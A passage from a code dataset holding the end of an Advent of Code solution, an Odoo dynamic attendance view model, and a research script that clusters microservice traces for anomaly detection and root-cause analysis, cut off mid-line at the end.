range(2):\n m.enhance(algo)\n print(\"Part1:\", len(m.m))\n for i in range(48):\n m.enhance(algo)\n print(\"Part2:\", len(m.m))\n except FileNotFoundError:\n print(\"Cannot open {}\".format(sys.argv[1]), file=sys.stderr)\n sys.exit(1)\n","repo_name":"funnydog/AoC2021","sub_path":"day20/day20.py","file_name":"day20.py","file_ext":"py","file_size_in_byte":2342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"37511897228","text":"# -*- coding: utf-8 -*-\n\nfrom datetime import datetime, timedelta\nfrom lxml import etree\n\nfrom openerp import models, fields, api\nfrom openerp.osv.orm import setup_modifiers\nfrom openerp.tools import DEFAULT_SERVER_DATE_FORMAT\n\n\n# class /users/moylop260/odoo/dynamic_view(models.Model):\n# _name = '/users/moylop260/odoo/dynamic_view./users/moylop260/odoo/dynamic_view'\n\n# name = fields.Char()\n# value = fields.Integer()\n# value2 = fields.Float(compute=\"_value_pc\", store=True)\n# description = fields.Text()\n#\n# @api.depends('value')\n# def _value_pc(self):\n# self.value2 = float(self.value) / 100\n# class HRAttendance(models.Models):\n\nclass DynamicView(models.Model):\n _name = 'dynamic.view'\n _auto = False\n\n employee_id = fields.Many2one('hr.employee', store=False, readonly=True)\n\n field_view_definition = ''\n default_state = None\n\n def get_field_states(self, label):\n states = self.env['hr.attendance']._fields['action'].selection\n return fields.Selection(states, string=label, automatic=True)\n\n @api.model\n def fields_view_get(self, view_id=None, view_type='form', toolbar=False,\n 
submenu=False):\n result = super(DynamicView, self).fields_view_get(\n view_id, view_type, toolbar=toolbar, submenu=submenu)\n if view_type == 'tree':\n doc = etree.XML(result['arch'])\n node = doc.xpath(\"//field[@name='employee_id']\")[0]\n parent_node = node.getparent()\n date_work = datetime.now()\n node_work = node\n for i in range(10):\n date_name = date_work.strftime('%b %d')\n t_date_name = date_work.strftime(DEFAULT_SERVER_DATE_FORMAT)\n self._add_field(t_date_name, self.get_field_states(date_name))\n self._proper_fields |= set(t_date_name)\n date_node = etree.fromstring(\n self.field_view_definition % t_date_name)\n parent_node.insert(parent_node.index(node) + 1, date_node)\n date_work += timedelta(days=1)\n node_work = date_node\n self._setup_fields(partial=True)\n result['arch'], result['fields'] = (\n self.env['ir.ui.view'].postprocess_and_fields(\n self._name, doc, None))\n # self = self.create({'employee_id': 1})\n return result\n\n @api.model\n def search_read(self, domain=None, fields=None, offset=0, limit=None, order=None):\n # res = super(DynamicView, self).search_read(\n # domain=domain, fields=fields, offset=offset, limit=limit, order=order)\n # TODO: Process the domain based on employee data\n attendance_brw = self.env['hr.attendance']\n employees = self.env['hr.employee'].search(\n [], limit=limit, offset=offset)\n res = []\n data_initial = dict((field, self.default_state)\n for field in fields if field[0].isdigit()) # Just dates fields\n attendances = attendance_brw.search([\n ('employee_id', 'in', employees.ids),\n ('name', 'in', data_initial.keys()),\n ])\n # print \"*\"*10,len(attendances), len(employees)\n attendances_dict = {}\n for attendance in attendances:\n date_name = attendance.name[:10]\n attendances_dict.setdefault(attendance.employee_id.id, {}).update({\n date_name: attendance.action,\n })\n dynamic_view = self.env['dynamic.view']\n for employee in employees:\n data = data_initial.copy()\n data.update(dict(\n employee_id=employee.id,\n **(attendances_dict.get(employee.id) or {})\n ))\n self.browse(employee.id)._update_cache(data)\n data.update(dict(id=employee.id))\n res.append(data)\n return res\n\n @api.multi\n def write(self, vals):\n self.ensure_one()\n attendance_brw = self.env['hr.attendance']\n employee_id = self.id\n domain = [('employee_id', '=', employee_id),\n # ('name', 'in', vals.keys())]) # TODO: Enable this line for the model where is used date. 
(and not datetime)\n ]\n attendances_dict = dict((attendance.name[:10], attendance) for attendance in attendance_brw.search(domain) if attendance.name[0].isdigit())\n for attendance_date in vals:\n attendance = attendances_dict.get(attendance_date)\n data = dict(\n employee_id=employee_id,\n action=vals[attendance_date],\n name=attendance_date + ' 00:00:00'\n )\n if not attendance:\n attendance = attendance_brw.create(data)\n else:\n attendance.write(data)\n self._update_cache(vals)\n # self.env['dynamic.view'].new(data)\n # vals.update({'employee_id': self.id})\n return True\n\n @api.multi\n def _update_cache(self, vals):\n for record in self:\n record._cache.update(record._convert_to_cache(vals, update=True))\n # mark the fields as being computed, to avoid their invalidation\n for key in vals:\n # self.env.cache.set\n self.env.computed[self._fields[key]].update(self._ids)\n # inverse the fields\n # for key in vals:\n # self._fields[key].determine_inverse(self) # get error\n for key in vals:\n self.env.computed[self._fields[key]].difference_update(self._ids)\n\n","repo_name":"moylop260/dynamic-view","sub_path":"dynamic_view/models/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"}
+{"seq_id":"12673446148","text":"from importlib.resources import path\nfrom multiprocessing import connection\nfrom re import T\nimport torch\nimport json\nimport argparse\nimport numpy as np\nimport random\nimport os\nfrom tqdm import tqdm\nfrom torch_geometric.loader import DataLoader\nfrom torch.utils.data import Subset\nimport time\nimport sys\nimport datetime\nfrom sklearn.metrics import accuracy_score, recall_score, precision_score\nfrom DataPreprocess.STVProcess import embedding_to_vector, load_dataset, process_one_trace, check_match, get_service_slo\nfrom DenStream.DenStream import DenStream\nfrom CEDAS.CEDAS import CEDAS\nfrom MicroRank.preprocess_data import get_span, get_service_operation_list, get_operation_slo\nfrom MicroRank.online_rca import rca\nfrom DataPreprocess.params import span_chaos_dict, trace_chaos_dict, request_period_log, normal_change_log\nfrom db_utils import *\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\nTwo_error = False\nK = [1, 3, 5, 7, 10] if Two_error==False else [2, 3, 5, 7, 10]\nall_path = dict()\noperation_service_dict = dict()\nRCA_level = 'service' # operation\nuse_manual = False\nmanual_labels_list = []\n# manual_labels_list = ['617d5c02352849119c2e5df8b70fa007.36.16503361793140001', 'dda6af5c49d546068432825e17b981aa.38.16503361824380001', '27a94f3afad745c69963997831868eb1.38.16503362398950001', '15480e1347c147a086b68221ca743874.38.16503369859250001', '262b9727d1584947a02905150a089faa.38.16503382599320123', 'ab212da6fff042febb91b313658a0005.46.16503384128150203', '0b225e568e304836a7901e0cff56205a.39.16503393835170053', '262b9727d1584947a02905150a089faa.39.16503397746270231'] # list of trace ids manually labeled as normal, manual_labels_list : [trace_id1, trace_id2, ...]\nfirst_tag = True\n# start_str = '2022-04-19 10:42:59' # '2022-04-18 21:08:00' # '2022-04-19 10:42:59' # trace: '2022-02-25 00:00:00', '2022-04-16 20:08:03', '2022-04-18 11:00:00', '2022-04-18 21:00:00'; span: '2022-01-13 00:00:00'\n# format stage\n# start_str = '2022-04-18 21:08:00' # changes\n# start_str = '2022-04-22 22:00:00' # changes new\n# start_str = '2022-04-18 11:00:00' # 1 abnormal\n# start_str = '2022-04-19 
10:42:59' # 2 abnormal\n# start_str = '2022-04-24 19:00:00' # 2 abnormal new\n# start_str = '2022-04-26 21:00:00' # 1 abnormal new 2022-04-26 21:02:22\n# start_str = '2022-04-28 12:00:00'\n# start_str = '2022-04-27 15:50:00' # 1 abnormal avail\n# start_str = '2022-05-01 00:00:00' # 1 change\n# start_str = '2022-04-28 12:00:00' # 2 abnormal\n# start_str = '2022-05-05 19:00:00' # 1 abnormal new 5-6\nstart_str = '2022-05-09 15:00:00' # change new 5-10\n\n# init stage\n# init_start_str = '2022-04-18 00:00:05' # normal old\ninit_start_str = '2022-04-26 08:22:09' # normal new\nwindow_duration = 6 * 60 * 1000 # ms\nwindow_duration_init = 6 * 60 * 1000 / 4 # ms\ncheck_window = 5 * 60 * 1000 # ms\nAD_method = 'DenStream_withoutscore' # 'DenStream_withscore', 'DenStream_withoutscore', 'CEDAS_withscore', 'CEDAS_withoutscore'\nSample_method = 'none' # 'none', 'micro', 'macro', 'rate'\ndataLevel = 'trace' # 'trace', 'span'\npath_decay = 0.01\npath_thres = 0.0\nreCluster_thres = 0.1\n\ndef timestamp(datetime: str) -> int:\n timeArray = time.strptime(str(datetime), \"%Y-%m-%d %H:%M:%S\")\n ts = int(time.mktime(timeArray)) * 1000\n return ts\n\ndef ms2str(ms: int) -> str:\n return time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime(ms/1000))\n\ndef intersect_or_not(start1: int, end1: int, start2: int, end2: int):\n if max(start1, start2) < min(end1, end2):\n return True\n else:\n return False\n\ndef get_operation_service_pairs(dataset):\n global operation_service_dict\n for trace_id, trace in dataset.items():\n for vertex_id, vertex in trace['vertexs'].items():\n if vertex_id == '0':\n continue\n if vertex[1] not in operation_service_dict.keys(): # operation\n operation_service_dict[vertex[1]] = vertex[0]\n\ndef simplify_cluster(cluster_obj, dataset, cluster_status, data_status): # dataset: [[STVector1, sample_info1], [STVector2, sample_info2]]\n global all_path\n global first_tag\n manual_count = 0\n for data in tqdm(dataset, desc=\"Cluster Samples: \"):\n # ========================================\n # Path vector encoder\n # ========================================\n if cluster_status == 'init':\n for status in all_path.values():\n status[0] -= path_decay\n all_path = process_one_trace(data, all_path)\n STVector = embedding_to_vector(data, all_path)\n elif cluster_status == 'reCluster':\n STVector = data[0]\n\n if AD_method in ['DenStream_withoutscore', 'DenStream_withscore']:\n # if use_manual == True and cluster_status == 'init':\n # cluster_obj.update_cluster_and_trace_tables()\n sample_label, label_status = cluster_obj.Cluster_AnomalyDetector(sample=np.array(STVector), sample_info=data if cluster_status=='init' else data[1], data_status=data_status, manual_labels_list=manual_labels_list, stage=cluster_status)\n elif AD_method in ['CEDAS_withoutscore', 'CEDAS_withscore']:\n if first_tag:\n # 1. Initialization\n sample_label, label_status = cluster_obj.initialization(sample=np.array(STVector), sample_info=data if cluster_status=='init' else data[1], data_status=data_status, manual_labels_list=manual_labels_list)\n first_tag = False\n else:\n cluster_obj.changed_cluster = None\n # 2. Update Micro-Clusters\n sample_label, label_status = cluster_obj.Cluster_AnomalyDetector(sample=np.array(STVector), sample_info=data if cluster_status=='init' else data[1], data_status=data_status, manual_labels_list=manual_labels_list)\n # 3. Kill Clusters\n cluster_obj.kill()\n if cluster_obj.changed_cluster and cluster_obj.changed_cluster.count > cluster_obj.threshold:\n # 4. 
Update Cluster Graph\n cluster_obj.update_graph()\n\n # label_status\n if label_status == 'manual':\n manual_count += 1\n\n\ndef init_Cluster(cluster_obj, init_start_str):\n # ========================================\n # Init time window\n # ========================================\n start = timestamp(init_start_str) # + 1 * 60 * 1000\n end = start + window_duration_init\n timeWindow_count = 0\n\n # ========================================\n # Init Data loader\n # ========================================\n if dataLevel == 'trace':\n print(\"Init Data loading ...\")\n # file = open(r'/data/TraceCluster/RCA/total_data/test.json', 'r')\n # file = open(r'/home/kagaya/work/TF-RCA/DataPreprocess/data/preprocessed/trainticket/2022-04-20_17-34-08/data.json', 'r') # old\n file = open(r'/home/kagaya/work/TF-RCA/data/preprocessed/trainticket/2022-05-08_14-03-38/data.json', 'r') # new\n raw_data_total = json.load(file)\n get_operation_service_pairs(raw_data_total)\n get_service_slo(raw_data=raw_data_total)\n print(\"Finish init data load !\")\n\n print('Init Start !')\n # Init main loop start\n while True:\n print('--------------------------------')\n print(f'time window: {ms2str(start)} ~ {ms2str(end)}')\n # temp\n # if dataLevel == 'trace':\n # if str(ms2str(start)) not in ['2022-02-25 01:00:00', '2022-02-25 02:00:00', '2022-02-25 03:00:00', '2022-02-25 05:00:00', '2022-02-25 09:00:00', '2022-02-25 11:00:00', '2022-02-25 13:00:00', '2022-02-25 14:00:00', '2022-02-25 17:00:00', '2022-02-25 18:00:00', '2022-02-25 19:00:00']:\n # start = end\n # end = start + window_duration\n # continue\n timeWindow_count += 1\n\n if dataLevel == 'span':\n dataset, raw_data_dict = load_dataset(start, end, dataLevel, 'init')\n elif dataLevel == 'trace':\n dataset, raw_data_dict = load_dataset(start, end, dataLevel, 'init', raw_data_total)\n\n if len(dataset) == 0:\n if start < timestamp(init_start_str) + (8 * 60 * 60 * 1000):\n start = end\n end = start + window_duration_init\n continue\n else: \n break\n \n # do cluster\n simplify_cluster(cluster_obj=cluster_obj, dataset=dataset, cluster_status='init', data_status='init')\n\n start = end\n end = start + window_duration_init\n\n delete_index_candidate = [status[1] for status in all_path.values() if status[0] <= path_thres]\n if len(delete_index_candidate) / len(all_path) >= reCluster_thres:\n do_reCluster(cluster_obj=cluster_obj, data_status='init', current_time=start)\n\n if timeWindow_count >= int(1 * 60 * 60 * 1000 / window_duration_init):\n break\n \n # update cluster table when finish init\n if use_manual == True:\n cluster_obj.update_cluster_and_trace_tables()\n print('Init finish !')\n\n \n\ndef do_reCluster(cluster_obj, data_status, current_time, label_map_reCluster=dict()):\n print(\"reCluster Start ...\")\n global all_path\n global first_tag\n delete_index = [status[1] for status in all_path.values() if status[0]= abnormal_count:\n cluster.label = 'normal'\n # if use_manual == True:\n # db_update_label(cluster_id=id(cluster), cluster_label=cluster.label)\n else:\n cluster.label = 'abnormal'\n # if use_manual == True:\n # db_update_label(cluster_id=id(cluster), cluster_label=cluster.label)\n label_map_reCluster = new_label_map_reCluster\n\n print(\"reCluster Finish !\")\n\n\n\ndef main():\n # manual labels list\n traceID_list = list()\n\n # ========================================\n # Init path vector encoder\n # all_path = {path1: [energy1, index1], path2: [energy2, index2]}\n # label_map_reCluster = {trace_id1: label1, trace_id2: label2}\n # ========================================\n # differences_count, 
differences_svc_count, ab_count, ad_count_list, root_cause_check_dict, in_rate, in_count_normal_dict, case_data_num, case_pattern, label_error_traces_init, label_error_traces_format, case_service_pattern = check_match()\n global all_path\n global first_tag\n global manual_labels_list\n label_map_reCluster = dict()\n\n # ========================================\n # Create db table\n # ========================================\n # cluster_sql = '''\n # create table clusters(\n # id int AUTO_INCREMENT primary key not null,\n # cluster_id varchar(100) CHARACTER SET utf8 COLLATE utf8_general_ci not null,\n # creation_time varchar(100) CHARACTER SET utf8 COLLATE utf8_general_ci not null,\n # cluster_label varchar(100) CHARACTER SET utf8 COLLATE utf8_general_ci not null,\n # member_count int not null,\n # member_ids varchar(100) CHARACTER SET utf8 COLLATE utf8_general_ci not null,\n # cluster_weight float not null,\n # )\n # '''\n # cur.execute(cluster_sql)\n # db_connect.commit()\n\n # ========================================\n # Create cluster object\n # Init clusters\n # ========================================\n if AD_method in ['DenStream_withscore', 'DenStream_withoutscore']:\n # denstream = DenStream(eps=0.3, lambd=0.1, beta=0.5, mu=11)\n denstream = DenStream(eps=1, lambd=0.1, beta=0.2, mu=6, use_manual=use_manual) # eps=80 beta=0.2 mu=6\n init_Cluster(denstream, init_start_str)\n elif AD_method in ['CEDAS_withscore', 'CEDAS_withoutscore']:\n cedas = CEDAS(r0=100, decay=0.001, threshold=5)\n first_tag = True\n init_Cluster(cedas, init_start_str)\n\n # ========================================\n # Init time window\n # ========================================\n # start_buffer <---6min---> start <---6min---> end <---6min---> end_buffer\n start = timestamp(start_str) # + 1 * 60 * 1000\n end = start + window_duration\n start_buffer = start - window_duration\n end_buffer = end + window_duration\n timeWindow_count = 0\n\n # ========================================\n # Init evaluation for AD\n # ========================================\n a_true, a_pred = [], []\n\n # ========================================\n # Init evaluation for RCA\n # ========================================\n trigger_count = 0\n r_true_count = len(request_period_log)\n r_pred_count_0 = 0\n r_pred_count_1 = 0\n r_pred_count_2 = 0\n r_pred_count_3 = 0\n r_pred_count_4 = 0\n TP = 0 # TP: predicted positive and the prediction is correct \n TN = 0 # TN: predicted negative and the prediction is correct\n FP = 0 # FP: an actual negative classified (predicted) as positive\n FN = 0 # FN: an actual positive classified (predicted) as negative\n\n # ========================================\n # Init root cause pattern\n # ========================================\n rc_pattern = []\n\n # ========================================\n # Data loader\n # ========================================\n if dataLevel == 'trace':\n print(\"Main Data loading ...\")\n # file = open(r'/data/TraceCluster/RCA/total_data/test.json', 'r')\n # file = open(r'/home/kagaya/work/TF-RCA/data/preprocessed/trainticket/2022-04-17_15-29-46/data.json', 'r')\n # file = open(r'/home/kagaya/work/TF-RCA/DataPreprocess/data/preprocessed/trainticket/2022-04-19_10-05-14/data.json', 'r') # 1 abnormal\n # file = open(r'/home/kagaya/work/TF-RCA/DataPreprocess/data/preprocessed/trainticket/2022-04-19_21-01-30/data.json', 'r') # 2 abnormal\n # file = open(r'/home/kagaya/work/TF-RCA/DataPreprocess/data/preprocessed/trainticket/2022-04-19_11-34-58/data.json', 'r') # change\n # file = open(r'/home/kagaya/work/TF-RCA/data/preprocessed/trainticket/2022-04-23_13-34-27/data.json', 'r') # change new\n # file = 
open(r'/home/kagaya/work/TF-RCA/data/preprocessed/trainticket/2022-04-25_12-40-13/data.json', 'r') # abnormal2 new\n # file = open(r'/home/kagaya/work/TF-RCA/data/preprocessed/trainticket/2022-04-27_22-19-20/data.json', 'r') # abnormal1 new new\n # file = open(r'/home/kagaya/work/TF-RCA/data/preprocessed/trainticket/2022-04-27_12-58-19/data.json', 'r') # abnormal1 new\n # file = open(r'/home/kagaya/work/TF-RCA/data/preprocessed/trainticket/2022-04-28_21-01-41/data.json', 'r')\n # file = open(r'/home/kagaya/work/TF-RCA/data/preprocessed/trainticket/2022-04-28_22-55-23/data.json', 'r')\n # file = open(r'/home/kagaya/work/TF-RCA/data/preprocessed/trainticket/2022-04-29_21-45-19/data.json', 'r')\n # file = open(r'/home/kagaya/work/TF-RCA/data/preprocessed/trainticket/2022-04-30_14-39-40/data.json', 'r') # abnormal 1 avail\n # file = open(r'/home/kagaya/work/TF-RCA/data/preprocessed/trainticket/2022-05-01_13-40-58/data.json', 'r') # change 1\n # file = open(r'/home/kagaya/work/TF-RCA/data/preprocessed/trainticket/2022-04-30_19-41-29/data.json', 'r') # abnormal 2\n # file = open(r'/home/kagaya/work/TF-RCA/data/preprocessed/trainticket/2022-05-06_17-28-43/data.json', 'r') # 1 abnormal new 5-6\n file = open(r'/home/kagaya/work/TF-RCA/data/preprocessed/trainticket/2022-05-11_00-06-32/data.json', 'r') # change new 5-10\n raw_data_total = json.load(file)\n get_operation_service_pairs(raw_data_total)\n print(\"Finish main data load !\")\n\n print('Start !')\n # main loop start\n while True:\n print('--------------------------------')\n print(f'time window: {ms2str(start)} ~ {ms2str(end)}')\n # temp\n # if dataLevel == 'trace':\n # if str(ms2str(start)) not in ['2022-02-25 01:00:00', '2022-02-25 02:00:00', '2022-02-25 03:00:00', '2022-02-25 05:00:00', '2022-02-25 09:00:00', '2022-02-25 11:00:00', '2022-02-25 13:00:00', '2022-02-25 14:00:00', '2022-02-25 17:00:00', '2022-02-25 18:00:00', '2022-02-25 19:00:00']:\n # start = end\n # end = start + window_duration\n # continue\n if ms2str(start) == '2022-05-01 02:12:00' or ms2str(start) == '2022-05-01 00:48:00': \n # why the order service traces are disconnected: 2022-05-01 00:48:00 ~ 2022-05-01 00:54:00 2022-05-01 02:06:00 ~ 2022-05-01 02:12:00 2022-05-01 02:12:00; recall is very low (0.30) in this period, f1 score 0.45\n # 2022-05-01 01:06:00 ~ 2022-05-01 01:12:00 2022-05-01 01:30:00 ~ 2022-05-01 01:36:00 anomaly detection is fully correct in this period, but root cause localization is inaccurate; the abnormal traces all share the same structure\n print(\"find it !\")\n if intersect_or_not(start1=start, end1=end, start2=request_period_log[2][1], end2=request_period_log[2][2]):\n print(\"find it !\")\n \n timeWindow_count += 1\n abnormal_count = 0\n abnormal_map = {}\n abnormal_seq_map = {}\n normal_seq_map = {}\n STV_map_window = {}\n tid_list = []\n if dataLevel == 'span':\n dataset, raw_data_dict = load_dataset(start, end, dataLevel, 'main')\n elif dataLevel == 'trace':\n dataset, raw_data_dict = load_dataset(start, end, dataLevel, 'main', raw_data_total)\n \n if len(dataset) == 0:\n if start < timestamp(start_str) + (8 * 60 * 60 * 1000):\n start = end\n end = start + window_duration\n continue\n else: \n break\n \n a_true, a_pred = [], []\n # Init manual count\n manual_count = 0\n for _, data in tqdm(enumerate(dataset), desc=\"Time Window Samples: \"):\n # ========================================\n # Path vector encoder\n # ========================================\n for status in all_path.values():\n status[0] -= path_decay\n all_path = process_one_trace(data, all_path)\n STVector = embedding_to_vector(data, all_path)\n STV_map_window[data['trace_id']] = np.array(STVector)\n\n 
a_true.append(data['trace_bool'])\n\n if AD_method in ['DenStream_withoutscore', 'DenStream_withscore']:\n if use_manual == True:\n denstream.update_cluster_and_trace_tables()\n sample_label, label_status = denstream.Cluster_AnomalyDetector(sample=np.array(STVector), sample_info=data, data_status='main', manual_labels_list=manual_labels_list)\n # if label_status == 'manual':\n label_map_reCluster[data['trace_id']] = sample_label\n elif AD_method in ['CEDAS_withoutscore', 'CEDAS_withscore']:\n if first_tag:\n # 1. Initialization\n sample_label, label_status = cedas.initialization(sample=np.array(STVector), sample_info=data, data_status='main', manual_labels_list=manual_labels_list)\n # if label_status == 'manual':\n label_map_reCluster[data['trace_id']] = sample_label\n first_tag = False\n else:\n cedas.changed_cluster = None\n # 2. Update Micro-Clusters\n sample_label, label_status = cedas.Cluster_AnomalyDetector(sample=np.array(STVector), sample_info=data, data_status='main', manual_labels_list=manual_labels_list)\n # if label_status == 'manual':\n label_map_reCluster[data['trace_id']] = sample_label\n # 3. Kill Clusters\n cedas.kill()\n if cedas.changed_cluster and cedas.changed_cluster.count > cedas.threshold:\n # 4. Update Cluster Graph\n cedas.update_graph()\n\n # trace_id list\n tid = data['trace_id']\n tid_list.append(tid)\n\n if AD_method in ['DenStream_withoutscore', 'CEDAS_withoutscore']:\n # sample_label\n if sample_label == 'abnormal':\n # if data['trace_bool'] == 1:\n a_pred.append(1)\n abnormal_map[tid] = True\n abnormal_count += 1\n abnormal_seq_map[tid] = data['service_seq']\n else:\n abnormal_map[tid] = False\n normal_seq_map[tid] = data['service_seq']\n a_pred.append(0)\n\n # label_status\n if label_status == 'manual':\n manual_count += 1\n\n if AD_method == 'DenStream_withscore':\n # manual_labels_list = denstream.update_cluster_and_trace_tables(manual_labels_list)\n # update cluster table when time window finish\n if use_manual == True:\n denstream.update_cluster_and_trace_tables()\n labels, confidenceScores, sampleRates = denstream.get_labels_confidenceScores_sampleRates(STV_map=STV_map_window, cluster_type=Sample_method)\n # sample_label\n for tid, sample_label in labels.items():\n label_map_reCluster[tid] = sample_label\n if sample_label == 'abnormal':\n a_pred.append(1)\n abnormal_map[tid] = True\n abnormal_count += 1\n if raw_data_total[tid]['abnormal'] == 0:\n traceID_list.append(tid)\n else:\n abnormal_map[tid] = False\n a_pred.append(0)\n AD_pattern = [micro_cluster for micro_cluster in denstream.p_micro_clusters+denstream.o_micro_clusters if micro_cluster.AD_selected==True]\n elif AD_method == 'CEDAS_withscore':\n manual_labels_list = cedas.update_cluster_and_trace_tables(manual_labels_list)\n labels, confidenceScores, sampleRates = cedas.get_labels_confidenceScores_sampleRates(STV_map=STV_map_window, cluster_type=Sample_method)\n # sample_label\n for tid, sample_label in labels.items():\n label_map_reCluster[tid] = sample_label\n if sample_label == 'abnormal':\n a_pred.append(1)\n abnormal_map[tid] = True\n abnormal_count += 1\n else:\n abnormal_map[tid] = False\n a_pred.append(0)\n AD_pattern = [micro_cluster for micro_cluster in cedas.micro_clusters if micro_cluster.AD_selected==True]\n\n\n print('Manual labeling count is ', manual_count)\n print('Manual labeling ratio is %.3f' % (manual_count/len(dataset)))\n print('--------------------------------')\n a_acc = accuracy_score(a_true, a_pred)\n a_prec = precision_score(a_true, a_pred)\n a_recall = 
recall_score(a_true, a_pred)\n a_F1_score = (2 * a_prec * a_recall)/(a_prec + a_recall)\n print('AD accuracy score is %.5f' % a_acc)\n print('AD precision score is %.5f' % a_prec)\n print('AD recall score is %.5f' % a_recall)\n print('AD F1 score is %.5f' % a_F1_score)\n print('--------------------------------')\n\n if AD_method in ['DenStream_withscore', 'CEDAS_withscore']:\n pattern_IoU = len(set(AD_pattern)&set(rc_pattern)) / len(set(AD_pattern)|set(rc_pattern)) if len(set(AD_pattern)|set(rc_pattern)) != 0 else -1\n else:\n pattern_IoU = -1\n\n if abnormal_count > 8 and pattern_IoU < 0.5:\n trigger_count += 1\n\n if AD_method in ['DenStream_withscore', 'CEDAS_withscore']:\n rc_pattern = AD_pattern\n\n print('********* RCA start *********')\n\n if AD_method in ['DenStream_withscore', 'CEDAS_withscore']:\n # tail-sample the traces here: the more samples a micro/macro cluster has, the lower its sampling probability, and vice versa\n # sample the traces of each cluster here at a fixed sampling probability; traces with different structures should keep the same sampling ratio\n # only the sampled trace ids need to be kept\n sampled_tid_list = []\n for tid in tid_list:\n if sampleRates[tid] >= np.random.uniform(0, 1):\n sampled_tid_list.append(tid)\n if len(sampled_tid_list) != 0:\n top_list, score_list = rca(RCA_level=RCA_level, start=start, end=end, tid_list=sampled_tid_list, trace_labels=abnormal_map, traces_dict=raw_data_dict, confidenceScores=confidenceScores, dataLevel=dataLevel)\n else:\n top_list = []\n else:\n top_list, score_list = rca(RCA_level=RCA_level, start=start, end=end, tid_list=tid_list, trace_labels=abnormal_map, traces_dict=raw_data_dict, dataLevel=dataLevel)\n \n # top_list is not empty\n if len(top_list) != 0: \n # topK_0\n topK_0 = top_list[:K[0] if len(top_list) > K[0] else len(top_list)]\n print(f'top-{K[0]} root cause is', topK_0)\n # topK_1\n topK_1 = top_list[:K[1] if len(top_list) > K[1] else len(top_list)]\n print(f'top-{K[1]} root cause is', topK_1)\n # topK_2\n topK_2 = top_list[:K[2] if len(top_list) > K[2] else len(top_list)]\n print(f'top-{K[2]} root cause is', topK_2)\n # topK_3\n topK_3 = top_list[:K[3] if len(top_list) > K[3] else len(top_list)]\n print(f'top-{K[3]} root cause is', topK_3)\n # topK_4\n topK_4 = top_list[:K[4] if len(top_list) > K[4] else len(top_list)]\n print(f'top-{K[4]} root cause is', topK_4)\n\n start_hour = time.localtime(start//1000).tm_hour\n # chaos_service = span_chaos_dict.get(start_hour)\n chaos_service_list = []\n for idx, root_cause_item in enumerate(request_period_log):\n # A: start, end B: root_cause_item[1], root_cause_item[2]\n # if ((root_cause_item[1]>end and root_cause_item[1]root_cause_item[2]) or (start>end and start=root_cause_item[1] and start<=root_cause_item[2]:\n if intersect_or_not(start1=start, end1=end, start2=root_cause_item[1], end2=root_cause_item[2]):\n # if in_rate[str(idx)]==1:\n # print(\"check it !\")\n chaos_service_list.append(root_cause_item[0][0] if len(root_cause_item[0])==1 else root_cause_item[0])\n print(f'ground truth root cause is', str(root_cause_item[0]))\n if len(chaos_service_list) == 0:\n FP += 1\n print(\"Ground truth root cause is empty !\")\n start = end\n end = start + window_duration\n continue\n # elif len(chaos_service_list) > 1 and Two_error == True:\n # new_chaos_service_list = [[chaos_service_list[0], chaos_service_list[1]]]\n # chaos_service_list = new_chaos_service_list\n\n in_topK_0 = False\n in_topK_1 = False\n in_topK_2 = False\n in_topK_3 = False\n in_topK_4 = False\n\n candidate_list_0 = []\n candidate_list_1 = []\n candidate_list_2 = []\n candidate_list_3 = []\n candidate_list_4 = []\n if RCA_level == 'operation':\n for topS in topK_0:\n 
candidate_list_0.append(operation_service_dict[topS])\n for topS in topK_1:\n candidate_list_1.append(operation_service_dict[topS])\n for topS in topK_2:\n candidate_list_2.append(operation_service_dict[topS])\n for topS in topK_3:\n candidate_list_3.append(operation_service_dict[topS])\n for topS in topK_4:\n candidate_list_4.append(operation_service_dict[topS])\n elif RCA_level == 'service':\n candidate_list_0 = topK_0\n candidate_list_1 = topK_1\n candidate_list_2 = topK_2\n candidate_list_3 = topK_3\n candidate_list_4 = topK_4\n if isinstance(chaos_service_list[0], list): # two faults injected at once\n for service_pair in chaos_service_list:\n if (service_pair[0] in candidate_list_0) and (service_pair[1] in candidate_list_0):\n in_topK_0 = True\n if (service_pair[0] in candidate_list_1) and (service_pair[1] in candidate_list_1):\n in_topK_1 = True\n if (service_pair[0] in candidate_list_2) and (service_pair[1] in candidate_list_2):\n in_topK_2 = True\n if (service_pair[0] in candidate_list_3) and (service_pair[1] in candidate_list_3):\n in_topK_3 = True\n if (service_pair[0] in candidate_list_4) and (service_pair[1] in candidate_list_4):\n in_topK_4 = True\n else:\n for service in chaos_service_list:\n if service in candidate_list_0:\n in_topK_0 = True\n if service in candidate_list_1:\n in_topK_1 = True\n if service in candidate_list_2:\n in_topK_2 = True\n if service in candidate_list_3:\n in_topK_3 = True\n if service in candidate_list_4:\n in_topK_4 = True\n \n if in_topK_0 == True:\n r_pred_count_0 += 1\n if in_topK_1 == True:\n r_pred_count_1 += 1\n if in_topK_2 == True:\n r_pred_count_2 += 1\n if in_topK_3 == True:\n r_pred_count_3 += 1\n if in_topK_4 == True:\n r_pred_count_4 += 1\n\n # # top_list is not empty\n # if len(top_list) != 0: \n # topK = top_list[:K if len(top_list) > K else len(top_list)]\n # print(f'top-{K} root cause is', topK)\n # start_hour = time.localtime(start//1000).tm_hour\n # if dataLevel == 'span':\n # chaos_service = span_chaos_dict.get(start_hour)\n # # elif dataLevel == 'trace':\n # # chaos_service = trace_chaos_dict.get(start_hour)\n # elif dataLevel == 'trace':\n # chaos_service = ''\n # for root_cause_item in request_period_log:\n # if start>=root_cause_item[1] and start<=root_cause_item[2]:\n # chaos_service = root_cause_item[0][0]\n # break\n\n # print(f'ground truth root cause is', chaos_service)\n\n # # zhoutong add\n # in_topK = True\n # candidate_list = []\n # for topS in topK:\n # candidate_list += topS.split('/')\n # if isinstance(chaos_service, list):\n # for service in chaos_service:\n # gt_service = service.replace('-', '')[2:]\n # if gt_service not in candidate_list:\n # in_topK = False\n # break\n # else:\n # gt_service = chaos_service.replace('-', '')[2:]\n # if gt_service not in candidate_list:\n # in_topK = False\n \n # # top_list is empty\n # elif len(top_list) == 0:\n # in_topK = False\n # r_pred.append(in_topK)\n else:\n rc_pattern = []\n TN += 1\n for root_cause_item in request_period_log:\n if intersect_or_not(start1=start, end1=end, start2=root_cause_item[1], end2=root_cause_item[2]):\n TN -= 1\n FN += 